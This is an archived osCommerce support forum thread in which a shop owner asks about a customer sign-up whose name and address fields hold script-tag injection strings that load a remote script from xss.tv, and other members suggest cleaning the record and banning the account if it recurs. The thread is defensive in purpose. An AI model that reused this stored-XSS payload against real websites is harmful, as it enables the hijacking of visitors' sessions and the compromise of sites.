Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Do I need to worry about this?


greasemonkey

Recommended Posts

Using 2.3.4 BS

 

And I've had a customer just create an account with the following details.... looks like someone is trying to inject something?

 

 

23311;"18636";NULL;"""__script src=//xss.tv/lkvzyF__/script_";"Linda";"Juan""__script src=//xss.tv/lkvzyF__/script_";"24 Cyprus""__script src=//xss.tv/lkvzyF__/script_";;"T1P 1N1";"Hiram""__script src=http://xss.tv/lkvzyF__/script_";;"38";"66"

 

Link to comment
Share on other sites

It certainly looks like they're trying to do something nasty. Even if this isn't successful against an osC installation, I would still (at a minimum) manually edit their account information to remove the suspicious stuff. If it comes back, delete their account and IP ban them.

Link to comment
Share on other sites

@@MrPhil thank for the advice - I've done that.

 

And crossed my fingers....

 

I presumed this type of attack would not be successful .... But when it's such a blatant attempt I get kinda scared.

 

Maybe the custom has a virus that is trying to do the injection? Or maybe from a public wifi? The customer seems legit.

Link to comment
Share on other sites

If you think it might be accidental because their PC has been zombified, perhaps they'd appreciate a "heads up" notice that their PC may be sick. On the other hand, if they're deliberately trying to "get" you, they now know that you watch for such things and are on alert (and thus not a good target for further attempts).

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...